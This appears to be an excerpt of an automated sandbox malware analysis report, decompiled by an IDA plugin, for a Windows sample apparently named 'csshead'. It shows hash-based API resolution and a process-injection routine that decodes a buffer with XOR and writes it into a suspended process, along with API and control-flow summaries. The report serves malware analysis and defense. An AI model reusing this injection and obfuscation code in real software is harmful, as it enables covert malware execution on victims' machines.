				 *0x40b320 = E00401994(_v12, 0x725cb0a1);
				 *0x40b250 = E00401994(_v12, 0x52ac19c);
				 *0x40b318 = E00401994(_v12, 0x23ebe98b);
				 *0x40b464 = E00401994(_v12, 0x3b3ee0f9);
				 *0x40b468 = E00401994(_v12, 0x8d5a50dc);
				 *0x40b46c = E00401994(_v12, 0x8d5a50ca);
				 *0x40b470 = E00401994(_v12, 0x5e7ee0d0);
				 *0x40b474 = E00401994(_v12, 0x69260152);
				 *0x40b478 = E00401994(_v12, 0x9c480e24);
				 *0x40b47c = E00401994(_v12, 0x5aa7e70b);
				 *0x40b488 = E00401994(_v12, 0xe74f57ee);
				 *0x40b48c = E00401994(_v12, 0x2d40b8f0);
				 *0x40b490 = E00401994(_v12, 0xae17c071);
				 *0x40b494 = E00401994(_v12, 0x515be757);
				 *0x40b49c = E00401994(_v12, 0x1297812c);
				 *0x40b4a0 = E00401994(_v12, 0x2f2feeda);
				 *0x40b4a4 = E00401994(_v12, 0x81f0f0df);
				 *0x40b4a8 = E00401994(_v12, 0xf3fd1c3);
				 *0x40b4ac = E00401994(_v12, 0xef48e03a);
				 *0x40b4b0 = E00401994(_v12, 0xfb0730c);
				 *0x40b4b4 = E00401994(_v12, 0xa9de6f5a);
				 *0x40b4b8 = E00401994(_v12, 0x723eb0d5);
				 *0x40b4bc = E00401994(_v12, 0x487fe16b);
				 *0x40b4c0 = E00401994(_v12, 0x8f8f114);
				 *0x40b4c4 = E00401994(_v12, 0x3d9972f5);
				 *0x40b4c8 = E00401994(_v12, 0x6fb89af0);
				 *0x40b4cc = E00401994(_v12, 0xc09d5d66);
				 *0x40b4d0 = E00401994(_v12, 0x2ca2b7e6);
				 *0x40b4d4 = E00401994(_v12, 0x7b88bf3b);
				 *0x40b4d8 = E00401994(_v12, 0xaa1de02f);
				 *0x40b4dc = E00401994(_v12, 0xa48d6762);
				 *0x40b4e0 = E00401994(_v12, 0x3a35705f);
				 *0x40b4e8 = E00401994(_v12, 0x697a6afe);
				 *0x40b4ec = E00401994(_v12, 0x95902b19);
				 *0x40b4f0 = E00401994(_v12, 0x1295012c);
				 *0x40b4f4 = E00401994(_v12, 0x2891ae7a);
				 *0x40b4f8 = E00401994(_v12, 0x831a3927);
				 *0x40b23c = E00401994(_v12, 0xd0498cd4);
				 *0x40c22c = E00401994(_v12, 0xd0498cc2);
				_t492 =  *0x40a084; // 0x401bf0
				_v12 = LoadLibraryA(_t492);
				 *0x40b230 = E00401994(_v12, 0xa638ce5f);
				 *0x40b234 = E00401994(_v12, 0xbc44a131);
				 *0x40b238 = E00401994(_v12, 0xf6edf382);
				_t500 =  *0x40a080; // 0x401be8
				_v12 = LoadLibraryA(_t500);
				 *0x40b2fc = E00401994(_v12, 0x1ab922bf);
				 *0x40b2f8 = E00401994(_v12, 0xa8afd1f3);
				 *0x40b300 = E00401994(_v12, 0xc6ce9b8a);
				 *0x40b304 = E00401994(_v12, 0xf26817eb);
				 *0x40b308 = E00401994(_v12, 0x7506e960);
				 *0x40b30c = E00401994(_v12, 0xbf7efb5a);
				 *0x40b310 = E00401994(_v12, 0x4baed1c8);
				 *0x40b484 = E00401994(_v12, 0x7396104b);
				 *0x40b480 = E00401994(_v12, 0xb800c8a6);
				 *0x40b388 = E00401994(_v12, 0x8616ab9b);
				 *0x40b38c = E00401994(_v12, 0xb4584dda);
				 *0x40b1b4 = E00401994(_v12, 0x6c7f716f);
				 *0x40b1b0 = E00401994(_v12, 0x252b53b);
				 *0x40b2ac = E00401994(_v12, 0xd36ceaf0);
				 *0x40b2b0 = E00401994(_v12, 0xd7a87c3a);
				 *0x40b2b4 = E00401994(_v12, 0xc45d9631);
				 *0x40b2b8 = E00401994(_v12, 0x4baed1de);
				 *0x40b2bc = E00401994(_v12, 0x8ebef5b1);
				 *0x40b270 = E00401994(_v12, 0xea3af0d7);
				 *0x40b418 = E00401994(_v12, 0x484007c);
				 *0x40b41c = E00401994(_v12, 0x58a81c29);
				 *0x40b420 = E00401994(_v12, 0xcacd450);
				 *0x40b424 = E00401994(_v12, 0xabbc680d);
				 *0x40b42c = E00401994(_v12, 0x7cbd2247);
				 *0x40b428 = E00401994(_v12, 0xbdb70517);
				 *0x40b430 = E00401994(_v12, 0x1d6c998b);
				 *0x40b434 = E00401994(_v12, 0xa2f65ba2);
				 *0x40b438 = E00401994(_v12, 0xad4ffcd5);
				 *0x40b43c = E00401994(_v12, 0xc8a274ac);
				 *0x40b440 = E00401994(_v12, 0x5fda1871);
				 *0x40b444 = E00401994(_v12, 0xc0d4187d);
				_t564 = LoadLibraryA("Psapi"); // executed
				_v12 = _t564;
				 *0x40b4e4 = E00401994(_v12, 0x860331a8);
				_t567 =  *0x40a0a4; // 0x401c40
				_t568 = LoadLibraryA(_t567); // executed
				_v12 = _t568;
				 *0x40b178 = E00401994(_v12, 0xa60c5f05);
				_t571 =  *0x40a0d0; // 0x401cac
				_v12 = LoadLibraryA(_t571);
				 *0x40b3ec = E00401994(_v12, 0x5af0017c);
				 *0x40b3f0 = E00401994(_v12, 0x5e10f525);
				 *0x40b3f4 = E00401994(_v12, 0x48b87efc);
				 *0x40b3f8 = E00401994(_v12, 0xdf91a857);
				 *0x40b3fc = E00401994(_v12, 0x9e90b462);
				 *0x40b400 = E00401994(_v12, 0x4894dafc);
				 *0x40b404 = E00401994(_v12, 0x59012669);
				_t587 =  *0x40a0e0; // 0x401d08
				_v12 = LoadLibraryA(_t587);
				 *0x40b330 = E00401994(_v12, 0xb9d41c2f);
				 *0x40b1b8 = E00401994(_v12, 0xb96ca1c0);
				 *0x40b1c0 = E00401994(_v12, 0x28e9e291);
				 *0x40b1c8 = E00401994(_v12, 0x1d1f334a);
				 *0x40b1cc = E00401994(_v12, 0x5cb5ef72);
				 *0x40b2c8 = E00401994(_v12, 0xce303c3a);
				 *0x40b2c4 = E00401994(_v12, 0x3e68cfc6);
				 *0x40b2cc = E00401994(_v12, 0xd4ecc759);
				 *0x40b2d0 = E00401994(_v12, 0xd21e3d01);
				 *0x40b2d4 = E00401994(_v12, 0xad0c9f7e);
				 *0x40b4fc = E00401994(_v12, 0x8ad7de34);
				 *0x40b500 = E00401994(_v12, 0x78660dbe);
				 *0x40b504 = E00401994(_v12, 0xcebf13be);
				 *0x40b508 = E00401994(_v12, 0xd4b3d42);
				 *0x40b50c = E00401994(_v12, 0x72760bb8);
				 *0x40b448 = E00401994(_v12, 0x3c4de260);
				 *0x40b44c = E00401994(_v12, 0xf837a387);
				 *0x40b450 = E00401994(_v12, 0xc3f46335);
				 *0x40b454 = E00401994(_v12, 0xa5ffa46e);
				 *0x40b458 = E00401994(_v12, 0x453db143);
				 *0x40b45c = E00401994(_v12, 0x37a53419);
				 *0x40b460 = E00401994(_v12, 0xcebf17e6);
				 *0x40b17c = E00401994(_v12, 0xaad67ff8);
				 *0x40b180 = E00401994(_v12, 0x3ef2d3dd);
				 *0x40b184 = E00401994(_v12, 0x90a097e6);
				 *0x40b16c = E00401994(_v12, 0x7a2167dc);
				 *0x40b170 = E00401994(_v12, 0x1b3d12b9);
				 *0x40b174 = E00401994(_v12, 0x80dbbe07);
				 *0x40b1ac = E00401994(_v12, 0x398c5285);
				 *0x40b1dc = E00401994(_v12, 0x560c7c4a);
				 *0x40b1d8 = E00401994(_v12, 0xdb355534);
				 *0x40b1d4 = E00401994(_v12, 0x3e400fd6);
				 *0x40b1e4 = E00401994(_v12, 0xee6ab5d);
				 *0x40b1e8 = E00401994(_v12, 0x1802e7c8);
				 *0x40b1ec = E00401994(_v12, 0xf65a7d95);
				 *0x40b224 = E00401994(_v12, 0xb8538a52);
				 *0x40b228 = E00401994(_v12, 0xccd03c3a);
				 *0x40b328 = E00401994(_v12, 0x6d523bdd);
				 *0x40b32c = E00401994(_v12, 0xf2f9de08);
				 *0x40b324 = E00401994(_v12, 0xce30283a);
				_t669 =  *0x40a094; // 0x401c20
				_v12 = LoadLibraryA(_t669);
				 *0x40b214 = E00401994(_v12, 0x3caa9945);
				 *0x40b218 = E00401994(_v12, 0x5a56b493);
				 *0x40b258 = E00401994(_v12, 0x7dfb3ef0);
				_t677 =  *0x40a088; // 0x401bf8
				_v12 = LoadLibraryA(_t677);
				 *0x40b14c = E00401994(_v12, 0xf2276995);
				 *0x40b21c = E00401994(_v12, 0xc95d8550);
				 *0x40b220 = E00401994(_v12, 0x570bc899);
				_t685 =  *0x40a098; // 0x401c28
				_v12 = LoadLibraryA(_t685);
				 *0x40b27c = E00401994(_v12, 0x368435be);
				 *0x40b280 = E00401994(_v12, 0xf341d5cf);
				 *0x40b284 = E00401994(_v12, 0xedb3159d);
				_t693 =  *0x40a1b8; // 0x401eec
				_v12 = LoadLibraryA(_t693);
				 *0x40b288 = E00401994(_v12, 0x3184919f);
				 *0x40b28c = E00401994(_v12, 0x39aedd1b);
				_t699 =  *0x40a0a0; // 0x401c38
				_t700 = LoadLibraryA(_t699); // executed
				_v12 = _t700;
				 *0x40b290 = E00401994(_v12, 0x8a94f707);
				 *0x40b294 = E00401994(_v12, 0x7aa45c7a);
				 *0x40b298 = E00401994(_v12, 0x4e26c00f);
				_t707 =  *0x40a0cc; // 0x401ca4
				_t708 = LoadLibraryA(_t707); // executed
				_v12 = _t708;
				 *0x40b33c = E00401994(_v12, 0x233e6d0f);
				_t712 = E00401994(_v12, 0xbf821ad);
				 *0x40b340 = _t712;
				if(_v8 != 0) {
					_t713 =  *0x40a1b0; // 0x401edc
					_v12 = LoadLibraryA(_t713);
					 *0x40b34c = E00401994(_v12, 0xd939f838);
					 *0x40b344 = E00401994(_v12, 0x9400a044);
					 *0x40b348 = E00401994(_v12, 0xee9bf475);
					 *0x40b3a4 = E00401994(_v12, 0xe797764);
					 *0x40b3a8 = E00401994(_v12, 0xedd8fe8a);
					 *0x40b3ac = E00401994(_v12, 0xe5971f6);
					 *0x40b3b0 = E00401994(_v12, 0x5d99726a);
					 *0x40b3b4 = E00401994(_v12, 0x1f935b1d);
					 *0x40b3b8 = E00401994(_v12, 0xfc7af16a);
					 *0x40b3bc = E00401994(_v12, 0x939d7d9c);
					 *0x40b3c0 = E00401994(_v12, 0xcdde757d);
					 *0x40b3c4 = E00401994(_v12, 0xc5a7764);
					 *0x40b3c8 = E00401994(_v12, 0x9e7d3188);
					 *0x40b3cc = E00401994(_v12, 0x3c797b7a);
					 *0x40b3d0 = E00401994(_v12, 0x4dfc1f3b);
					 *0x40b3d4 = E00401994(_v12, 0x8e9bf775);
					 *0x40b3d8 = E00401994(_v12, 0x8fb8b5bd);
					 *0x40b3dc = E00401994(_v12, 0xb909d088);
					 *0x40b3e0 = E00401994(_v12, 0xf44318c6);
					 *0x40b3e4 = E00401994(_v12, 0x95e4a5d7);
					_t755 =  *0x40a1b4; // 0x401ee4
					_v12 = LoadLibraryA(_t755);
					 *0x40b13c = E00401994(_v12, 0xaa91290b);
					 *0x40b350 = E00401994(_v12, 0x8593dd7);
					 *0x40b354 = E00401994(_v12, 0x6ae49924);
					 *0x40b358 = E00401994(_v12, 0x7314fb0c);
					 *0x40b35c = E00401994(_v12, 0xb87dbd66);
					 *0x40b360 = E00401994(_v12, 0x2f5ce027);
					 *0x40b364 = E00401994(_v12, 0xa3a80ab6);
					 *0x40b368 = E00401994(_v12, 0xddcb15d);
					 *0x40b36c = E00401994(_v12, 0x8733d614);
					 *0x40b370 = E00401994(_v12, 0xfde87743);
					 *0x40b390 = E00401994(_v12, 0x1a212962);
					 *0x40b394 = E00401994(_v12, 0x9f13856a);
					 *0x40b398 = E00401994(_v12, 0xbe618d3e);
					 *0x40b39c = E00401994(_v12, 0x1510002f);
					 *0x40b3a0 = E00401994(_v12, 0x7edec584);
					 *0x40b380 = E00401994(_v12, 0xaa912901);
					 *0x40b374 = E00401994(_v12, 0x2ae71934);
					 *0x40b378 = E00401994(_v12, 0x1ad09c78);
					 *0x40b37c = E00401994(_v12, 0x9ef6461);
					_t712 = E00401994(_v12, 0x57fbc0dd);
					 *0x40b3e8 = _t712;
				}
				return _t712;
			}























    0x0040257a
    0x00402582
    0x00402592
    0x004025a4
    0x004025b6
    0x004025c8
    0x004025da
    0x004025ec
    0x004025fe
    0x00402610
    0x00402622
    0x00402634
    0x00402646
    0x00402658
    0x0040266a
    0x0040267c
    0x0040268e
    0x004026a0
    0x004026b2
    0x004026c4
    0x004026d6
    0x004026e8
    0x004026fa
    0x0040270c
    0x0040271e
    0x00402730
    0x00402742
    0x00402754
    0x00402766
    0x00402778
    0x0040278a
    0x0040279c
    0x004027ae
    0x004027c0
    0x004027d2
    0x004027e4
    0x004027f6
    0x00402808
    0x0040281a
    0x0040282c
    0x0040283e
    0x00402850
    0x00402862
    0x00402874
    0x00402886
    0x00402898
    0x004028aa
    0x004028bc
    0x004028ce
    0x004028e0
    0x004028f2
    0x00402904
    0x00402916
    0x00402928
    0x0040293a
    0x0040294c
    0x0040295e
    0x00402970
    0x00402982
    0x00402994
    0x004029a6
    0x004029b8
    0x004029ca
    0x004029dc
    0x004029ee
    0x00402a00
    0x00402a12
    0x00402a24
    0x00402a36
    0x00402a48
    0x00402a5a
    0x00402a6c
    0x00402a7e
    0x00402a90
    0x00402aa2
    0x00402ab4
    0x00402ac6
    0x00402ad8
    0x00402aea
    0x00402afc
    0x00402b0e
    0x00402b20
    0x00402b32
    0x00402b44
    0x00402b56
    0x00402b68
    0x00402b7a
    0x00402b8c
    0x00402b9e
    0x00402bb0
    0x00402bc2
    0x00402bd4
    0x00402be6
    0x00402bf8
    0x00402c0a
    0x00402c1c
    0x00402c2e
    0x00402c40
    0x00402c52
    0x00402c64
    0x00402c76
    0x00402c88
    0x00402c9a
    0x00402cac
    0x00402cbe
    0x00402cd0
    0x00402ce2
    0x00402cf4
    0x00402d06
    0x00402d18
    0x00402d2a
    0x00402d3c
    0x00402d4e
    0x00402d53
    0x00402d5f
    0x00402d6f
    0x00402d81
    0x00402d93
    0x00402d98
    0x00402da4
    0x00402db4
    0x00402dc6
    0x00402dd8
    0x00402dea
    0x00402dfc
    0x00402e0e
    0x00402e20
    0x00402e32
    0x00402e44
    0x00402e56
    0x00402e68
    0x00402e7a
    0x00402e8c
    0x00402e9e
    0x00402eb0
    0x00402ec2
    0x00402ed4
    0x00402ee6
    0x00402ef8
    0x00402f0a
    0x00402f1c
    0x00402f2e
    0x00402f40
    0x00402f52
    0x00402f64
    0x00402f76
    0x00402f88
    0x00402f9a
    0x00402fac
    0x00402fbe
    0x00402fd0
    0x00402fda
    0x00402fe0
    0x00402ff0
    0x00402ff5
    0x00402ffb
    0x00403001
    0x00403011
    0x00403016
    0x00403022
    0x00403032
    0x00403044
    0x00403056
    0x00403068
    0x0040307a
    0x0040308c
    0x0040309e
    0x004030a3
    0x004030af
    0x004030bf
    0x004030d1
    0x004030e3
    0x004030f5
    0x00403107
    0x00403119
    0x0040312b
    0x0040313d
    0x0040314f
    0x00403161
    0x00403173
    0x00403185
    0x00403197
    0x004031a9
    0x004031bb
    0x004031cd
    0x004031df
    0x004031f1
    0x00403203
    0x00403215
    0x00403227
    0x00403239
    0x0040324b
    0x0040325d
    0x0040326f
    0x00403281
    0x00403293
    0x004032a5
    0x004032b7
    0x004032c9
    0x004032db
    0x004032ed
    0x004032ff
    0x00403311
    0x00403323
    0x00403335
    0x00403347
    0x00403359
    0x0040336b
    0x0040337d
    0x00403382
    0x0040338e
    0x0040339e
    0x004033b0
    0x004033c2
    0x004033c7
    0x004033d3
    0x004033e3
    0x004033f5
    0x00403407
    0x0040340c
    0x00403418
    0x00403428
    0x0040343a
    0x0040344c
    0x00403451
    0x0040345d
    0x0040346d
    0x0040347f
    0x00403484
    0x0040348a
    0x00403490
    0x004034a0
    0x004034b2
    0x004034c4
    0x004034c9
    0x004034cf
    0x004034d5
    0x004034e5
    0x004034f2
    0x004034f7
    0x00403500
    0x00403506
    0x00403512
    0x00403522
    0x00403534
    0x00403546
    0x00403558
    0x0040356a
    0x0040357c
    0x0040358e
    0x004035a0
    0x004035b2
    0x004035c4
    0x004035d6
    0x004035e8
    0x004035fa
    0x0040360c
    0x0040361e
    0x00403630
    0x00403642
    0x00403654
    0x00403666
    0x00403678
    0x0040367d
    0x00403689
    0x00403699
    0x004036ab
    0x004036bd
    0x004036cf
    0x004036e1
    0x004036f3
    0x00403705
    0x00403717
    0x00403729
    0x0040373b
    0x0040374d
    0x0040375f
    0x00403771
    0x00403783
    0x00403795
    0x004037a7
    0x004037b9
    0x004037cb
    0x004037dd
    0x004037ea
    0x004037ef
    0x004037ef
    0x00403858

    APIs
    • LoadLibraryA.KERNEL32(00401BF0), ref: 00402D59
    • LoadLibraryA.KERNEL32(00401BE8), ref: 00402D9E
    • LoadLibraryA.KERNELBASE(Psapi), ref: 00402FDA
    • LoadLibraryA.KERNELBASE(00401C40), ref: 00402FFB
    • LoadLibraryA.KERNEL32(00401CAC), ref: 0040301C
    • LoadLibraryA.KERNEL32(00401D08), ref: 004030A9
    • LoadLibraryA.KERNEL32(00401C20), ref: 00403388
    • LoadLibraryA.KERNEL32(00401BF8), ref: 004033CD
    • LoadLibraryA.KERNEL32(00401C28), ref: 00403412
    • LoadLibraryA.KERNEL32(00401EEC), ref: 00403457
    • LoadLibraryA.KERNELBASE(00401C38), ref: 0040348A
    • LoadLibraryA.KERNELBASE(00401CA4), ref: 004034CF
    • LoadLibraryA.KERNEL32(00401EDC), ref: 0040350C
    • LoadLibraryA.KERNEL32(00401EE4), ref: 00403683
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004260A2, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109librarythread

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1297 4260a2-4260b4 GetModuleHandleW 1298 4260b6-4260be call 425d81 1297->1298 1299 4260bf-426107 GetProcAddress * 4 1297->1299 1300 426109-426110 1299->1300 1301 42611f-42613e 1299->1301 1300->1301 1304 426112-426119 1300->1304 1303 426143-426151 TlsAlloc 1301->1303 1306 426218 1303->1306 1307 426157-426162 TlsSetValue 1303->1307 1304->1301 1308 42611b-42611d 1304->1308 1310 42621a-42621c 1306->1310 1307->1306 1309 426168-4261ae call 4243ec RtlEncodePointer * 4 call 42bf11 1307->1309 1308->1301 1308->1303 1315 4261b0-4261cd RtlDecodePointer 1309->1315 1316 426213 call 425d81 1309->1316 1315->1316 1319 4261cf-4261e1 call 42a124 1315->1319 1316->1306 1319->1316 1322 4261e3-4261f0 RtlDecodePointer 1319->1322 1323 4261f4-4261f6 1322->1323 1323->1316 1324 4261f8-426211 call 425dbe GetCurrentThreadId 1323->1324 1324->1310
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00424C8B), ref: 004260AA
    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004260CC
    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004260D9
    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004260E6
    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004260F3
    • TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
    • TlsSetValue.KERNEL32(00000000,?,00424C8B), ref: 0042615E
    • RtlEncodePointer.NTDLL ref: 00426179
    • RtlEncodePointer.NTDLL ref: 00426186
    • RtlEncodePointer.NTDLL ref: 00426193
    • RtlEncodePointer.NTDLL ref: 004261A0
      • Part of subcall function 0042BF11: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0042BF39
    • RtlDecodePointer.NTDLL(Function_00015F05), ref: 004261C1
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • RtlDecodePointer.NTDLL(00000000), ref: 004261F0
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    • GetCurrentThreadId.KERNEL32 ref: 00426202
      • Part of subcall function 00425D81: RtlDecodePointer.NTDLL(0044204C), ref: 00425D92
      • Part of subcall function 00425D81: TlsFree.KERNEL32(00442050,00426218,?,00424C8B), ref: 00425DAC
      • Part of subcall function 00425D81: RtlDeleteCriticalSection.NTDLL(00000000), ref: 0042BF78
      • Part of subcall function 00425D81: RtlDeleteCriticalSection.NTDLL(00442050), ref: 0042BFA2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00405028, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 215threadprocessfile

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1327 405028-40503c 1328 40503e-405046 GetModuleHandleA 1327->1328 1329 405049-40504d 1327->1329 1328->1329 1330 40504f-405053 1329->1330 1331 405061-40509d call 401258 CreateProcessA 1329->1331 1330->1331 1333 405055-40505e call 4012dc 1330->1333 1337 4050a3-40517f call 4010b4 call 401164 call 40133c CreateFileMappingA MapViewOfFile call 4012b8 * 2 call 4013b4 call 4012b8 1331->1337 1338 4052ce-4052d4 1331->1338 1333->1331 1353 405181-405185 1337->1353 1354 4051a5-4051e2 call 4012dc call 4012b8 call 404ef0 1337->1354 1356 40518c-4051a3 1353->1356 1362 4051e4-405211 call 401258 GetThreadContext 1354->1362 1363 405225-405229 1354->1363 1356->1354 1356->1356 1362->1363 1372 405213-40521a 1362->1372 1365 40522b-405233 call 404de0 1363->1365 1366 405236-40523a 1363->1366 1365->1366 1366->1338 1367 405240-405288 VirtualProtectEx WriteProcessMemory call 401828 ResumeThread 1366->1367 1375 4052b5-4052b7 1367->1375 1376 40528a-40529a WaitForSingleObject 1367->1376 1372->1363 1374 40521c-405222 1372->1374 1374->1363 1379 4052ba-4052c8 CloseHandle * 2 1375->1379 1377 40529c-4052aa GetExitCodeProcess 1376->1377 1378 4052ac-4052b3 1376->1378 1377->1379 1378->1379 1379->1338
    C-Code - Quality: 98%
    			E00405028(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				long _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				signed int _v32;
				long _v36;
				long _v40;
				char _v44;
				struct _STARTUPINFOA _v112;
				void* _v124;
				struct _CONTEXT _v332;
				char _v353;
				signed int _t107;
				void* _t125;
				void* _t127;
				void* _t144;
				long _t154;

				_v8 = 0xffffffff;
				if(_a8 == 0) {
					_a8 = GetModuleHandleA(0);
				}
				if(_a16 != 0 && _a20 == 0xffffffff) {
					_a20 = E004012DC(_a16) + 1;
				}
				E00401258( &_v112, 0x44);
				_v112.cb = 0x44;
				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters)); // executed
				asm("sbb eax, eax");
				_t109 =  ~( ~_t107);
				if( ~( ~_t107) == 0) {
					L22:
					return _v8;
				}
				E00401164(E004010B4(_t109, 0x44),  &_v353);
				E0040133C( &_v353, "_section");
				_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
				_t125 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353); // executed
				_v12 = _t125;
				_t127 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0); // executed
				_v16 = _t127;
				E004012B8(_v16, _v24, _a8);
				 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
				 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
				E004012B8(_v16 + _v24 + 8, _a20, _a16);
				_v24 = 0x29b;
				E004013B4( &_v28, _v24 + 0x11); // executed
				E004012B8(_v28, _v24, 0x40a2ac);
				_t144 = _v24 - 1;
				if(_t144 < 0) {
					L9:
					_v20 = E004012DC( &_v353) + 1;
					E004012B8(_v28 + _v24, _v20,  &_v353);
					_v24 = _v24 + _v20;
					_v40 = 0;
					_t154 = E00404EF0(_v332.ExtendedRegisters.hProcess, _t224); // executed
					_v40 = _t154;
					if(_v40 == 0) {
						E00401258( &_v332, 0xcc);
						_v332.ContextFlags = 0x10007;
						if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
							_v40 = _v332.Eax;
						}
					}
					_t228 = _v40;
					if(_v40 == 0) {
						_v40 = E00404DE0(_v332.ExtendedRegisters.hProcess, _t228);
					}
					if(_v40 != 0) {
						VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36); // executed
						WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20); // executed
						E00401828(_v28); // executed
						ResumeThread(_v124); // executed
						if(_a24 == 0) {
							__eflags = 0;
							_v8 = 0;
						} else {
							if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
								_v8 = 0xfffffffe;
							} else {
								GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
							}
						}
						CloseHandle(_v124);
						CloseHandle(_v332.ExtendedRegisters);
					}
					goto L22;
				}
				_v44 = _t144 + 1;
				_v32 = 0;
				do {
					 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
					_v32 = _v32 + 1;
					_t55 =  &_v44;
					 *_t55 = _v44 - 1;
					_t224 =  *_t55;
				} while ( *_t55 != 0);
				goto L9;
			}






















    0x00405031
    0x0040503c
    0x00405046
    0x00405046
    0x0040504d
    0x0040505e
    0x0040505e
    0x00405069
    0x0040506e
    0x0040508f
    0x00405097
    0x00405099
    0x0040509d
    0x004052ce
    0x004052d4
    0x004052d4
    0x004050ae
    0x004050bf
    0x004050d9
    0x004050f5
    0x004050fb
    0x0040510d
    0x00405113
    0x0040511f
    0x00405130
    0x0040513e
    0x0040514f
    0x00405154
    0x00405164
    0x00405174
    0x0040517c
    0x0040517f
    0x004051a5
    0x004051b1
    0x004051c3
    0x004051cb
    0x004051d0
    0x004051d6
    0x004051db
    0x004051e2
    0x004051ef
    0x004051f4
    0x00405211
    0x00405222
    0x00405222
    0x00405211
    0x00405225
    0x00405229
    0x00405233
    0x00405233
    0x0040523a
    0x00405252
    0x0040526c
    0x00405275
    0x0040527e
    0x00405288
    0x004052b5
    0x004052b7
    0x0040528a
    0x0040529a
    0x004052ac
    0x0040529c
    0x004052a4
    0x004052a4
    0x0040529a
    0x004052be
    0x004052c8
    0x004052c8
    0x00000000
    0x0040523a
    0x00405182
    0x00405185
    0x0040518c
    0x0040519a
    0x0040519d
    0x004051a0
    0x004051a0
    0x004051a0
    0x004051a0
    0x00000000

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00405040
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
    • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 00405209
    • CloseHandle.KERNEL32(?), ref: 004052C8
      • Part of subcall function 00404DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E
    • VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
    • WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ResumeThread.KERNELBASE(?), ref: 0040527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
    • CloseHandle.KERNEL32(?), ref: 004052BE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
